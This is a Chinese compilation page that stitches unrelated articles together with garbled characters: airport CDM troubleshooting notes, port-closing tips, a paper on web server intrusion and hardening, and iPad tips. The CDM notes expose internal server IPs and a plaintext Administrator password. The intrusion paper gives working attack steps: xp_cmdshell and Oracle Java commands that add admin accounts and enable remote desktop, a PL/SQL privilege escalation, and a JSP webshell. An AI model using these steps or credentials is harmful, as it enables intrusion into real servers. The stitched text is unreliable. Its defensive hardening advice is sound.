windows xp的“幫助和支持中心”功能��,可以向用戶提供集中化服務(wù)和幫助�����,用戶和程序可以通過使用“”前綴執(zhí)行uri鏈接來訪問幫助和支持中心���。由于幫助和支持中心程序沒有有效的檢查通過hcp協(xié)議傳遞來的信息,導(dǎo)致一個(gè)緩沖溢出漏洞存在��。當(dāng)用戶與因特網(wǎng)聯(lián)接時(shí)��,黑客就可以利用這個(gè)安全漏洞,從一個(gè)網(wǎng)頁或html格式電子郵件中的鏈接對存在這一缺陷的機(jī)器進(jìn)行遠(yuǎn)程訪問���,能夠打開或刪除被攻擊機(jī)器上的文件��。
第6篇
關(guān)鍵詞:CDM COBT CTOT 航班時(shí)刻 系統(tǒng)運(yùn)行效率
中圖分類號:TV213.2 文獻(xiàn)標(biāo)識碼:A 文章編號:1007-9416(2015)12-0000-00
1 CDM系統(tǒng)概述
近年來隨著航班量不斷增加���,直接導(dǎo)致航班延誤嚴(yán)重、正常率低�����,無法獲得航班預(yù)計(jì)起飛時(shí)間���,從而出現(xiàn)民航運(yùn)行壓力大��,旅客長時(shí)間在飛機(jī)上等待而引發(fā)的一系列矛盾沖突和不安全問題���。
CDM(collaborative Decision Making)即運(yùn)行協(xié)同決策系統(tǒng),該系統(tǒng)是基于資源共享和信息交換的系統(tǒng)�����,通過接收各種外部信息(航班計(jì)劃、流量限制信息等)�����,根據(jù)排序規(guī)則���,產(chǎn)生離港航班隊(duì)列��,根據(jù)航班隊(duì)列自動(dòng)/人工生成進(jìn)離港航班���、拖拽飛機(jī)��、飛越計(jì)劃的各種電子進(jìn)程單���,管制員根據(jù)這些電子進(jìn)程單記錄地面管制信息��,通過對電子進(jìn)程單的拖拽���、點(diǎn)擊或修改電子進(jìn)程單狀態(tài)、內(nèi)容��,完成放行許可席���、地面管制席���、塔臺(tái)管制席之間的管制移交��,使用技術(shù)手段改善航班延誤相關(guān)問題�����, 是一個(gè)開放性的信息采集���、融合和共享平臺(tái)。
2 CDM系統(tǒng)建設(shè)
CDM系統(tǒng)由運(yùn)行態(tài)勢���、出港航班�����、進(jìn)港航班�����、統(tǒng)計(jì)信息�����、系統(tǒng)管理�����、消息公告六個(gè)核心模塊構(gòu)成�����。運(yùn)行協(xié)同決策系統(tǒng)工作流程為空管用戶根據(jù)航空公司或航務(wù)單位提供FPL提交預(yù)計(jì)撤輪檔時(shí)間(EOBT)輸出計(jì)算撤輪檔時(shí)間(COBT)���、計(jì)算起飛時(shí)間(CTOT)���、航空公司或航務(wù)單位在不晚于COBT前50分鐘確認(rèn)COBT是否可行,若可行�����,系統(tǒng)將COBT時(shí)間鎖定�����;若COBT變化超出容差裕度時(shí)���,航空公司或航務(wù)單位可與空管進(jìn)行協(xié)調(diào)�����,重新確認(rèn)���。東北地區(qū)沈陽、大連��、長春��、哈爾濱均安裝使用CDM系統(tǒng)��,沈陽通過ATM設(shè)備引接深圳CDM數(shù)據(jù)���,大連�����、長春�����、哈爾濱通過ATM設(shè)備引接沈陽CDM數(shù)據(jù)�����,從而引接深圳CDM數(shù)據(jù)�����,沈陽CDM用戶主要是空管部門和航空公司�����,空管用戶主要包括區(qū)調(diào)和塔臺(tái)�����,區(qū)調(diào)和塔臺(tái)通過交換網(wǎng)引接CDM數(shù)據(jù)�����,航空公司主要是南航和深航��,南航和深航通過光纖引接CDM數(shù)據(jù)���,各用戶通過終端的操作,輸入修改航班信息���,協(xié)調(diào)出最有效率的航班信息��。網(wǎng)絡(luò)拓?fù)鋱D如圖1所示�����。
圖1.沈陽CDM系統(tǒng)網(wǎng)絡(luò)拓?fù)鋱D
東北CDM系統(tǒng)服務(wù)器和核心網(wǎng)絡(luò)設(shè)備建立于沈陽桃仙國際機(jī)場航管樓三層設(shè)備機(jī)房內(nèi)���,主要包括數(shù)據(jù)處理主機(jī)�����、數(shù)據(jù)庫主機(jī)�����、信息接口主機(jī)���、核心交換機(jī)、核心路由器等��,通過專用光纖網(wǎng)絡(luò)建立系統(tǒng)數(shù)據(jù)源引接和用戶終端連接��,包括相應(yīng)的網(wǎng)絡(luò)線路��、接入交換機(jī)��、接入路由器等。CDM系統(tǒng)采用SOA架構(gòu)�����,數(shù)據(jù)庫采用Oracle 10g��,主要配置服務(wù)器16臺(tái)終端(位于塔臺(tái)��、近進(jìn)���、區(qū)調(diào)��、南航���、深航、T3航站樓)�����,磁盤存儲(chǔ)1套��,交換機(jī)4臺(tái)���,路由器2臺(tái)���,系統(tǒng)運(yùn)行時(shí)監(jiān)控界面如圖2所示:
圖2.CDM系統(tǒng)運(yùn)行監(jiān)控界面
上圖右側(cè)服務(wù)器提示紅色,是不正常的��,可自行登錄服務(wù)器查找原因或者聯(lián)系廠家工程師查找原因��。
用戶終端系統(tǒng)主要由航班動(dòng)態(tài)�����、運(yùn)行態(tài)勢�����、協(xié)同工具���、航班歷史數(shù)據(jù)查詢�����、航班信息統(tǒng)計(jì)等模塊組成��。能打開登錄頁面��,表示系統(tǒng)正常運(yùn)行���。
3 CDM系統(tǒng)故障分析及處理方法總結(jié)
CDM系統(tǒng)在在沈陽地區(qū)從安裝到運(yùn)行近半年的時(shí)間�����,以下幾個(gè)故障在值班過程中發(fā)現(xiàn)�����,聯(lián)系廠家工程師���,共同研究探討出處理方法。
(1)機(jī)場排序系統(tǒng)與AIMS系統(tǒng)不同步��,如何處理�����?監(jiān)控電腦 WIN+R鍵���,出現(xiàn)上圖�����,輸入mstsc���,遠(yuǎn)程桌面連接10.20.102.162服務(wù)器��, 輸入用戶:Administrator,密碼:caac~123��,打開服務(wù)界面���,找到“AYATC ATMS AIMSIntegrated Winservice”服務(wù)并重啟���,重啟后查看LOG記錄,路徑:D:AIMSIntegratedService/log/ATRS.log.txt
(2)CDM系統(tǒng)通過引接AIMS系統(tǒng)獲取航班航班數(shù)據(jù)信息的�����,若CDM協(xié)同決策平臺(tái)與AIMS不一致��,如FPL狀態(tài)不一致�����,如何處理��?通過遠(yuǎn)程桌面連接登陸至10.20.102.162服務(wù)器,輸入用戶:Administrator��,密碼:caac~123�����,打開服務(wù)界面��,找到“AYATC ATMS cdm Integrated Service” 項(xiàng)服務(wù)并重啟��,重啟后查看LOG記錄�����,路徑:D:cdmIntegratedService/log/ATRS.log.txt
(3)停機(jī)位故障(含F(xiàn)IPS��,ATMS系統(tǒng))��,如何處理���?通過遠(yuǎn)程桌面連接登陸至10.20.102.162服務(wù)器�����,輸入用戶:Administrator��,密碼:caac~123���,打開服務(wù)界面�����,找到“SYATC ATMS ParkingBayService” 項(xiàng)(停機(jī)位獲取子服務(wù))服務(wù)并重啟���,重啟后查看LOG記錄�����,路徑:D:ParkingBayService/log/ATRS.log.txt
(4)電子進(jìn)程單無法登陸(含F(xiàn)IPS�����, ATMS系統(tǒng))�����,如何處理���?通過遠(yuǎn)程桌面連接登陸至10.20.102.161服務(wù)器���,輸入用戶:Administrator��,密碼:caac~123���,打開服務(wù)界面,找到“SYATC ATMS AppWinService”項(xiàng)( 沈陽空管航班管理系統(tǒng)應(yīng)用服務(wù))并重啟�����,重啟后查看LOG記錄��,路徑:D:DmanWinServer/AppServer/log/Atms.log
登陸CDM-領(lǐng)班主任(雙擊)�����,菜單欄-設(shè)置-異常席位解鎖���,放行�����、塔臺(tái)��、地面���、進(jìn)近(雙擊解鎖)���,運(yùn)行界面如圖3所示:
圖3.電子進(jìn)程單運(yùn)行界面
(5)CDM系統(tǒng)引接雷達(dá)部門28所系統(tǒng)獲取數(shù)據(jù)信息,若獲取28所信息(SSR)失敗��,如何處理���?通過遠(yuǎn)程桌面連接登陸至10.20.102.163服務(wù)器��,輸入用戶:Administrator��,密碼:caac~123,打開服務(wù)桌面�����,直接重啟桌面FDT程序(28所ScrCode獲取程序)
(6)二十八所綜合航跡捕獲程序故障���,如何處理���?通過遠(yuǎn)程桌面連接登陸至10.20.102.174服務(wù)器,輸入用戶:Administrator�����,密碼:caac~123,打開服務(wù)桌面RADAR程序(二十八所綜合航跡捕獲程序)press anykey to continue.選擇網(wǎng)卡“1”��。
(7)服務(wù)器或磁盤陣列柜中硬盤故障���,如何處理���?IBM服務(wù)器有保修和備件更換服務(wù),發(fā)生硬盤故障先聯(lián)系IBM技術(shù)支持��,并按照技術(shù)支持人員的建議進(jìn)行處理��。首先確認(rèn)硬盤故障(可通過狀態(tài)燈閃爍確認(rèn))��,然后拔出故障硬盤并觀察系統(tǒng)運(yùn)行狀態(tài)���;插入新的硬盤��,觀察硬盤重建過程��。
(8)報(bào)文亂碼導(dǎo)致收報(bào)程序異常退出��,如何處理��?停止收報(bào)程序和串口通信程序���,檢查目前最后一份收報(bào)流水號���,并確定亂碼報(bào)文,停止自動(dòng)要報(bào)功能�����。運(yùn)行串口通信程序和要報(bào)程序��,查看最新報(bào)文流水號���,在轉(zhuǎn)報(bào)機(jī)上手工要報(bào)但要跳過亂碼報(bào)文�����,觀察收報(bào)程序運(yùn)行情況,重新打開自動(dòng)要報(bào)功能��,停止并重新運(yùn)行收報(bào)程序��。
(9)用戶終端故障��,如何處理?如果用戶終端系統(tǒng)崩潰��,或因硬件原因造成硬盤破壞���,則需要對系統(tǒng)進(jìn)行重裝���。重裝有兩種方法,一種是鏡像克隆��,即將其它CDM終端的鏡像數(shù)據(jù)全部復(fù)制到該終端��。方法如下:1)安裝操作系統(tǒng)及軟件���。在光驅(qū)中插入可啟動(dòng)并具有克隆功能的WINPE光盤�����,重啟終端���,按F12鍵進(jìn)入啟動(dòng)選項(xiàng),選擇光盤啟動(dòng)��。啟動(dòng)后,用GHOST軟件讀取光盤或者U盤上的鏡像文件�����,進(jìn)行影像對整個(gè)磁盤的克隆���。使用WINPE進(jìn)行GHOST時(shí)���,先進(jìn)入WINPE系統(tǒng),點(diǎn)擊GHOST一鍵備份還原-手動(dòng)運(yùn)行GHOST-LOCAL-DISK-FromImage-找到GHOST文件位置���,并點(diǎn)擊Ghost文件���,選擇目標(biāo)位置為第一個(gè)黑色的字體,顯示的磁盤OK-OK-YES�����,即將開始還原系統(tǒng)���。2)系統(tǒng)配置。因?yàn)榭寺『笮碌慕K端上的設(shè)置和舊終端是相同的�����,為避免和舊終端發(fā)生沖突,必需進(jìn)行網(wǎng)絡(luò)設(shè)置(設(shè)置前不要接網(wǎng)線��,設(shè)置好再接網(wǎng)線)���。在網(wǎng)上鄰居-屬性-TCP/IP屬性設(shè)置本機(jī)IP地址和子網(wǎng)掩碼���,最好設(shè)置和原來的一樣,設(shè)置完用PING命令進(jìn)行測試是否能連接到服務(wù)器���。
選中我的電腦-屬性-網(wǎng)絡(luò)標(biāo)識-屬性-修改計(jì)算機(jī)名后重新啟動(dòng)���。用本機(jī)超級用戶登錄,我的電腦-屬性-本地用戶和組-組-Administrastors組-添加-高級-系統(tǒng)提示輸入用戶名和密碼��。然后進(jìn)行CDM客戶端安裝��。
另一種方法為在終端安裝操作系統(tǒng)��、驅(qū)動(dòng)及客戶端軟件安裝等��,比較復(fù)雜��,至少需要1-2個(gè)小時(shí),不推薦使用��。
4結(jié)語
以上是本人在CDM運(yùn)行期間所遇到比較典型的故障及處理總結(jié)��,難免有不足之處���,請各位領(lǐng)導(dǎo)同仁指正�����。
參考文獻(xiàn)
第7篇
下面是筆者經(jīng)過長時(shí)間搜集積累的一些端口的知識��,不看不知道��,端口也和服務(wù)扯上聯(lián)系���,哪些端口和哪些服務(wù)有聯(lián)系?請大家耐心看�����。
每一項(xiàng)服務(wù)都對應(yīng)相應(yīng)的端口�����,比如眾所周知的WWW服務(wù)的端口是80�����,SMTP是25�����,F(xiàn)TP是21���,Windows安裝中默認(rèn)的這些服務(wù)都是開啟的�����。對于個(gè)人用戶來說確實(shí)沒有必要�����,關(guān)掉端口也就是關(guān)閉無用的服務(wù)�����。
關(guān)閉服務(wù)要通過“控制面板”/“管理工具”/“服務(wù)”來配置��。
關(guān)閉80端口:關(guān)掉WWW服務(wù)��。在“服務(wù)”中顯示名稱為“World Wide Web Publishing Service”�����,通過 Internet信息服務(wù)的管理單元提供 Web 連接和管理�����。
關(guān)掉25端口:關(guān)閉Simple Mail Transport Protocol (SMTP)服務(wù)�����,它提供的功能是跨網(wǎng)傳送電子郵件��。
關(guān)掉21端口:關(guān)閉FTP Publishing Service�����,它提供的服務(wù)是通過 Internet 信息服務(wù)的管理單元提供 FTP 連接和管理��。
關(guān)掉23端口:關(guān)閉Telnet服務(wù)�����,它允許遠(yuǎn)程用戶登錄到系統(tǒng)并且使用命令行運(yùn)行控制臺(tái)程序�����。
還有一個(gè)很重要的就是關(guān)閉server服務(wù),此服務(wù)提供 RPC支持���、文件、打印以及命名管道共享���。關(guān)掉它就關(guān)掉了Windows的默認(rèn)共享��,比如ipc$��、c$���、admin$等等,此服務(wù)關(guān)閉不影響你的其他操作�����。
上面的是一些常見的端口的關(guān)閉方法���,下面介紹的是黑客經(jīng)常入侵的兩個(gè)端口���。
3389端口
首先說明3389端口是windows的遠(yuǎn)程管理終端所開的端口���,它并不是一個(gè)木馬程序,請先確定該服務(wù)是否是你自己開放的�����。如果不是必須的�����,請關(guān)閉該服務(wù)��。
3389端口關(guān)閉方法
在Windows 2000中
Windows 2000 server:開始-->程序-->管理工具-->服務(wù)里找到Terminal Services服務(wù)項(xiàng)�����,選中屬性選項(xiàng)將啟動(dòng)類型改成手動(dòng)��,并停止該服務(wù)���。
Windows 2000 pro:開始-->設(shè)置-->控制面板-->管理工具-->服務(wù)里找到Terminal Services服務(wù)項(xiàng)��,選中屬性選項(xiàng)將啟動(dòng)類型改成手動(dòng)��,并停止該服務(wù)��。
在Windows XP中
在我的電腦上點(diǎn)右鍵選屬性-->遠(yuǎn)程���,將里面的遠(yuǎn)程協(xié)助和遠(yuǎn)程桌面兩個(gè)選項(xiàng)框里的勾去掉��,如圖1所示�����。
139端口
139端口是NetBIOS Session的端口,用來支持文件和打印共享�����,要注意的是運(yùn)行samba的unix機(jī)器也開放了139端口���,功能一樣�����。以前流光2000用來判斷對方主機(jī)類型不太準(zhǔn)確��,估計(jì)就是139端口開放即認(rèn)為是NT機(jī)�����。
139端口關(guān)閉方法
第8篇
關(guān)鍵詞:B/S服務(wù)器��;入侵分析�����;安全防護(hù)
中圖分類號:TP311文獻(xiàn)標(biāo)識碼:A文章編號:1009-3044(2011)01-0029-02
Talk about Intrusion and Safety of Web Server
HUANG Jing-hua
(Sontan College Guangzhou University, Zengcheng 511370, China)
Abstract: With the popularization of computers, the Internet INTERNET rapid development, based on B/S side of the information system, such as office automation systems, electronic government, universities and other educational systems in all walks of universal access, further information has been widely used. How can we better protect the security of Web server makes the B/S information system running smoothly client does not seem to have overlooked important issues. This Windows 2003-based platform for multiple applications such as Microsoft SQL Server 2000, Oracle 10g, JSP / ASP services, application, analysis of the common Web server intrusion methods and security protection.
Key words: B/S server; intrusion analysis; safety
近年來��,計(jì)算機(jī)普及�����、互聯(lián)網(wǎng)INTERNET飛速發(fā)展��。B/S端類型的服務(wù)業(yè)務(wù)平臺(tái)已在教育��、政企���、科研等多個(gè)領(lǐng)域中得到廣泛的應(yīng)用��,很多企業(yè)都將應(yīng)用系統(tǒng)從C/S類型向B/S類型轉(zhuǎn)變��,如財(cái)務(wù)管理系統(tǒng)�����、飛機(jī)售票系統(tǒng)���、高校教務(wù)系統(tǒng)等��。B/S端信息系統(tǒng)已在各行各業(yè)普及使用�����,如何有效解決Web服務(wù)器的安全是信息化成功���、企業(yè)穩(wěn)定發(fā)展的關(guān)鍵,也是推廣Web業(yè)務(wù)不可缺少的前提因素���。
1 入侵Web服務(wù)器方式分析
1.1 SQL入侵
Sa弱口令入侵。Sa是SQLServer的管理員帳號��,擁有最高權(quán)限�����,它可以執(zhí)行擴(kuò)展存儲(chǔ)過程�����,并獲得返回值,正因?yàn)檫@樣��,如安裝在Web服務(wù)器中SQL數(shù)據(jù)庫sa用戶的口令給黑客獲得的話��,黑客就可以在Web服務(wù)器為所欲為��。入侵過程如下:
首先有sql查詢分析器連接上Web服務(wù)器上的SQL數(shù)據(jù)庫�����,在查詢分析器上輸入” exec sp_addextendedproc 'xp_cmdshell', 'Xplog70.dll' ”命令執(zhí)行�����,目的讓對方數(shù)據(jù)庫SQL的存儲(chǔ)過程xp_cmdshell能夠正常有權(quán)限被使用�����。
接著在查詢分析器里添加一個(gè)管理員用戶��,語句為 “exec master..xp_cmdshell 'net user ceshi 98765321 /add' ���;exec master..xp_cmdshell 'net localgroup administrators ceshi /add'”���。
最后在查詢分析器里開啟遠(yuǎn)程計(jì)算機(jī)的遠(yuǎn)程桌面服務(wù)���,語句為“
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp /v EnableWinStation /t REG_DWORD /d 1“。
1.2 Oracle入侵
ORACLE數(shù)據(jù)庫默認(rèn)安裝以后有很多帳戶密碼都是默認(rèn)的�����,如果管理員安全意識不高很容易被人利用從而獲得系統(tǒng)權(quán)限�����。
首先要使用lsnrctl得到對方的SID號��。使用lsnrctl工具連接對方IP的listener�����,在CMD里輸入lsnrctl 進(jìn)入lsnrctl后 執(zhí)行 Set current_listener 目標(biāo)IP 和Status命令���,這個(gè)時(shí)候可以看到服務(wù) china 和modose 這2個(gè)有一個(gè)是SID號;
接著安裝個(gè)ORACLE的客戶端��,使用Sqlplus連接服務(wù)器���,格式 sqlplus DBSNMP/DBSNMP@//202.98.123.79:1521/china 成功登陸���,執(zhí)行 select * from user_role_privs; 可以看出當(dāng)前用戶只具有CONNECT權(quán)限��。利用Oracle本地PL/SQL漏洞進(jìn)行權(quán)限提升��,成功提升為DBA權(quán)限�����,命令如下:
SQL> Exec ctxsys.driload.validate_stmt('grant dba to dbsnmp');
最后借用Oracle支持的Java特性���,創(chuàng)建可以執(zhí)行系統(tǒng)命令的存儲(chǔ)過程,增加管理員賬號(Windows平臺(tái)的Oracle默認(rèn)以system賬號運(yùn)行��,所以我們執(zhí)行的命令也是以system賬號權(quán)限執(zhí)行),下面創(chuàng)建一個(gè)JAVA源程序�����,以便執(zhí)行系統(tǒng)命令��。創(chuàng)建名為”util”的JAVA程序的主體代碼如下:public static int RunThis(String args) { Runtime rt = Runtime.getRuntime(); int RC = -1; try {Process p = rt.exec(args); int bufSize = 4096;
BufferedInputStream bis =new BufferedInputStream(p.getInputStream(), bufSize);
int len; byte buffer[] = new byte[bufSize]; while ((len = bis.read(buffer, 0, bufSize)) != -1)
System.out.write(buffer, 0, len); RC = p.waitFor(); } catch (Exception e) { e.printStackTrace();
RC = -1; }
存儲(chǔ)過程如下:create or replace function run_cmz(p_cmd in varchar2) return number as language java name 'util.RunThis(java.lang.String) return integer'; 執(zhí)行存儲(chǔ)命令 exec :x:=run_cmz('cmd /c ver'); exec :x:=run_cmz('cmd /c 'net user ceshi 98765321 /add '); exec :x:=run_cmz('cmd /c 'net localgroup administrators ceshi /add');這樣就可以添加了windows 2003系統(tǒng)用戶�����,并提升到超級管理員的權(quán)限。如要開啟遠(yuǎn)程計(jì)算機(jī)3389服務(wù)��,只要執(zhí)行如下命令:
exec :x:=run_cmz('cmd /c 'REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp /v EnableWinStation /t REG_DWORD /d 1 ');
1.3 上傳漏洞的利用
這種技術(shù)方式是利用網(wǎng)站的上傳功能來上傳木馬��,正常來說���,ASP/PHP/JSP為后綴的文件在網(wǎng)站是不允許上傳���,但是黑客會(huì)攻破這道防護(hù),采取其它技術(shù)來上傳ASP/PHP/JSP木馬���,獲得服務(wù)器的WEBSHELL權(quán)限�����。如Ewebeditor組件在JSP/ASP/PHP開發(fā)起到很大作用��,但卻帶來很大的安全隱患�����,它常被用作上傳木馬的手段。如JSP網(wǎng)站服務(wù)器�����,通過Ewebeditor可上傳abc.jsp文件到服務(wù)器,abc.jsp文件代碼如下:
String output = "";if(cmd != null) {String s = null;try {
Process p = Runtime.getRuntime().exec(cmd);
BufferedReader sI = new BufferedReader(new InputStreamReader(p.getInputStream()));
while((s = sI.readLine()) != null) {output += s;}}catch(IOException e) {e.printStackTrace();}
}%>
在瀏覽器上面輸入目標(biāo)ip/abc.jsp?cmd= 'net user ceshi 98765321 /add';
目標(biāo)ip/abc.jsp?cmd='net localgroup administrators ceshi /add';
目標(biāo)ip/abc.jsp?cmd=' REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp /v EnableWinStation /t REG_DWORD /d 1';
這樣就可以添加了windows 2003系統(tǒng)用戶���,并提升到超級管理員的權(quán)限��。如要開啟遠(yuǎn)程計(jì)算機(jī)3389服務(wù)�����。
2 服務(wù)器安全防護(hù)---應(yīng)對策略
2.1 架構(gòu)安全的Web服務(wù)器
目前�����,比較主流的操作系統(tǒng)是Windows2003系統(tǒng)���,但因其自身存在著許多系統(tǒng)漏澗及安全隱患,如何對服務(wù)器進(jìn)行安全檢測和安全配置顯得十分重要���。
1)安裝操作系統(tǒng)時(shí)要選擇NTFS文件格式��,裝完操作系統(tǒng)要?dú)⒍拒浖?/p>
2)安裝系統(tǒng)補(bǔ)丁��。掃描漏洞全面殺毒; 刪除Windows Server 2003默認(rèn)共享,命令如下:
@echo off ;
net share C$ /del;
net share D$ /del;
3)禁用IPC連接
在命令行輸入如下命令即可進(jìn)行連接:net use\目標(biāo)ip\ipc$ "password" /user:"usernqme"���。我們可以通過修改注冊表來禁用IPC連接���。打開注冊表編輯器。找到如下組建HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa中的restrictanonymous子鍵�����,將其值改為1即可禁用IPC連接�����。
4)刪除"網(wǎng)絡(luò)連接"里的協(xié)議和服務(wù)
在"網(wǎng)絡(luò)連接"里���,把不需要的協(xié)議和服務(wù)都刪掉��,這里只安裝了基本的Internet協(xié)議(TCP/IP)�����,同時(shí)在高級tcp/ip設(shè)置里--"NetBIOS"設(shè)置"禁用tcp/IP上的NetBIOS(S)"�����。
5)啟用windows連接防火墻��,只開放web服務(wù)(80端口)��。
windows連接防火墻可以有效地?cái)r截對Windows 2003服務(wù)器的非法入侵�����,防止非法遠(yuǎn)程主機(jī)對服務(wù)器的掃描�����,從而提高Windows 2003服務(wù)器的安全性�����。同時(shí)��,它也可以有效攔截利用操作系統(tǒng)漏洞進(jìn)行端口攻擊的病毒��,如沖擊波等蠕蟲病毒���。如果在用Windows 2003構(gòu)造的虛擬路由器上啟用此防火墻功能,能夠?qū)φ麄€(gè)內(nèi)部網(wǎng)絡(luò)起到很好的保護(hù)作用���,因此我們只開放web服務(wù)器常用端口�����,如80端口�����。
2.2 構(gòu)建數(shù)據(jù)庫及程序的安全體系
1) 預(yù)防ACCESS數(shù)據(jù)庫下載���。把ACCESS數(shù)據(jù)庫的擴(kuò)展名mdb改為asp/php��,通過這種方式來解決ACCESS數(shù)據(jù)庫被識別下載�����。
2) 防SQL注入攻擊��。從程序的本身著手���,對于用戶輸入的數(shù)據(jù)不能直接傳參,最有效的方法還是通過存儲(chǔ)過程來防止SQL注入�����。
3) 強(qiáng)化數(shù)據(jù)庫密碼的強(qiáng)度,防止數(shù)據(jù)庫的密碼泄露�����,定期修改數(shù)據(jù)庫密碼��,保證數(shù)據(jù)庫密碼的安全��。
3 結(jié)束語
隨著網(wǎng)絡(luò)飛速發(fā)展及B/S服務(wù)業(yè)務(wù)的廣泛應(yīng)用��,服務(wù)器的安全問題是不可忽略的���,防護(hù)與入侵這一對矛盾是永遠(yuǎn)存在的。本文結(jié)合工作實(shí)際�����,分析了Web服務(wù)器的入侵方式���,給出了服務(wù)器安全防護(hù)的應(yīng)對策略��。
參考文獻(xiàn):
[1] 徐玉國,韓兆君.Web應(yīng)用程序中的數(shù)據(jù)庫安全策略[J].電腦知識與技術(shù),2007(1):23.
第9篇
iPad帶有你可能已經(jīng)聽說過的所有各種功能,但是,如果進(jìn)一步探究的話,它還有許多會(huì)令你大吃一驚的隱藏功能�����。這些秘密中的一些是通過應(yīng)用程序來實(shí)現(xiàn)的,而另一些則已經(jīng)內(nèi)建在設(shè)備中��。
把iPad變成桌面顯示器
在計(jì)算機(jī)上安裝相應(yīng)的工具軟件并將其連接到Air Display System Preference,iPad就可以成為一個(gè)額外的屏幕�����?����?梢栽贒isplays System Preference中調(diào)整其位置,可以以水平視圖或垂直視圖的方式工作��。盡管它在顯示視頻的時(shí)候略有延遲,但是,對于大多數(shù)工作來說,它刷新得足夠快,你甚至可以觸摸iPad來實(shí)現(xiàn)點(diǎn)擊操作��。
如果等不及Air Display,你現(xiàn)在可以考慮 iDisplay(5美元)�����。但這是個(gè)有問題的競爭性產(chǎn)品,需要進(jìn)行更新才能很好地與Air Display比拼��。
播放PC上的電影
即便你購買了最大容量的iPad,如果它不能裝下你的所有視頻的話,它還是太小了���。你可以使用iPad播放本地或網(wǎng)絡(luò)上的視頻,而不是試圖把所有內(nèi)容都放入到iPad中��。這個(gè)過程有一個(gè)缺陷:如果你從iTunes商店購買電影或者TV,DRM限制會(huì)阻止這些文件(播客視頻和音樂視頻應(yīng)該可以播放)���。但是,你可以觀看自己的視頻而不受DRM下載服務(wù)的限制�����。
在眾多可用的選項(xiàng)中,我最喜歡Air Video(3美元),只要在PC或Mac上安裝一個(gè)服務(wù)器工具,就可以把數(shù)據(jù)導(dǎo)向iPad�����。以我的測試,Air Video對大多數(shù)分辨率的視頻都能順利地播放,包括通過802.11n Wi-Fi 無線網(wǎng)絡(luò)的720p視頻文件���。
該分辨率的視頻在802.11g網(wǎng)絡(luò)上不能順暢地傳輸,但是,如果你訪問一個(gè)太大的文件或者不是iPad友好的QuickTime格式的文件,包括AVI�����、WMV���、ASF��、MKV���、DIVX和FLV,你可能要讓PC遠(yuǎn)程轉(zhuǎn)換該視頻。只需要從iPad界面點(diǎn)擊一個(gè)按鈕就可以開始播放視頻,或者用一個(gè)快速的PC處理它并現(xiàn)場播放,它甚至支持字幕和TV輸出���。iPad可以通過其售價(jià)29美元的Dock Connector to VGA適配器以1024×768的分辨率向TV發(fā)送視頻,通過49美元的Apple Component A/V Cable傳送576p和 480p的視頻,或通過Apple Composite Cable(也是49美元)發(fā)送576i或480i的視頻���。
不只連接攝像頭
Apple的iPad Camera Connection Kit(29美元)的功能比描述的要多�����。這款適配器的USB端口可以連接廣泛的設(shè)備,而不只是從照相機(jī)或SD卡導(dǎo)出照片和視頻��。
很多USB鍵盤都可以與iPad 連接,雖然iPad會(huì)給出一個(gè)警告,說不支持該設(shè)備,但是,如果它不消耗太多電力,你完全可以忽略該消息�����。不但音量和媒體鍵有效,你甚至可以使用Command-Z這樣的桌面命令(別忘了,iPad還正式支持藍(lán)牙鍵盤和App的iPad鍵盤Dock)�����。
USB音頻設(shè)備也可以正常工作,包括話筒�����、耳機(jī)和麥克��。即使一個(gè)設(shè)備需要較多的電量或繁瑣步驟也沒有問題:只要把設(shè)備連接到一個(gè)供電的USB hub,并且把hub連接到Camera Connection Kit適配器�����。我們甚至可以同時(shí)連接不同的設(shè)備,例如,鍵盤和話筒組��。
破解更多功能
Apple對iPad的強(qiáng)制性控制,使得它不太像是一臺(tái)計(jì)算機(jī),而更像是一款媒體播放器��。但是,你也有替代選擇:破解你的iPad,然后,可以運(yùn)行Apple未批準(zhǔn)的第三方應(yīng)用程序�����。
如果你想要破解你的iPad,這意味著,你將會(huì)失去iPad保修,并且你要對可能發(fā)生的錯(cuò)誤承擔(dān)完全責(zé)任,或者你也可以使用Camera Connection Kit來讀取USB記憶棒和SD卡目錄���。這樣,即使沒有破解,你也已經(jīng)可以使用SD卡視頻和照片���。或者附加一個(gè)Compact Flash閱讀器,稍稍折騰一下,你就可以從一個(gè)外部USB硬盤讀取文件�����。當(dāng)然,對于那些熱衷技術(shù)或甘愿冒險(xiǎn)的人,破解才是最好的選擇��。
你可以把iPad連接到一臺(tái)計(jì)算機(jī),運(yùn)行Sprit然后通過Cydia界面安裝應(yīng)用程序���。Cydia和iTunes應(yīng)用程序可以共存,因此,你可以安裝Backgrounder和Multiflow這樣的應(yīng)用程序,從而允許多任務(wù)處理。當(dāng)然,多任務(wù)在OS 4.0中將正式出現(xiàn)��。注意,在我們撰寫這篇文章時(shí),ProSwitcher(公認(rèn)的最佳的iPhone多任務(wù)應(yīng)用破解程序)并沒有針對iPad優(yōu)化,堅(jiān)持使用那些已經(jīng)針對iPad重新編寫的破解應(yīng)用程序可能會(huì)有助于避免不必要的麻煩。
其他的破解應(yīng)用程序包括適用于iPad版本的Wi-Fi Sync (無線iTunes同步)��、Winterboard(定制主題)和Dashboard(OS X風(fēng)格小掛件)��。我們還可以使用帶有鼠標(biāo)的iPad運(yùn)行游戲控制臺(tái)模擬器和手柄,并且還可以做一些Apple所不允許的事情���。隨著iPad破解社區(qū)的發(fā)展,好處還將不斷增多��。
遠(yuǎn)程訪問PC
如果你周末匆忙地離開,忘記把一封重要的商務(wù)文件復(fù)制到筆記本電腦上,可以使用iPad遠(yuǎn)程桌面工具來訪問這些內(nèi)容�����。
不管你是通過互聯(lián)網(wǎng)來訪問,或者只是在旁邊的房間里,這個(gè)過程的速度肯定不足以平穩(wěn)地播放視頻,因此你可能要安裝Hulu補(bǔ)丁���。但是,如果你可以達(dá)到每秒鐘處理10到20幀的速度,使用大多數(shù)其他應(yīng)用程序以及慢速移動(dòng)的Flash游戲例如Farmville,都是沒有問題的。
在眾多的選擇中,我喜歡LogMeIn Ignition(如果想要盡可能少地進(jìn)行配置的話,需要30美元)和iTeleport(25美元),如果想要手動(dòng)設(shè)置的話,還要加上 VNC Viewer(10美元)���。你需要首先給PC配置一個(gè)服務(wù)器工具軟件(或者有一個(gè)內(nèi)置到OS中的選項(xiàng)),然后,你就可以連接任何地方�����。
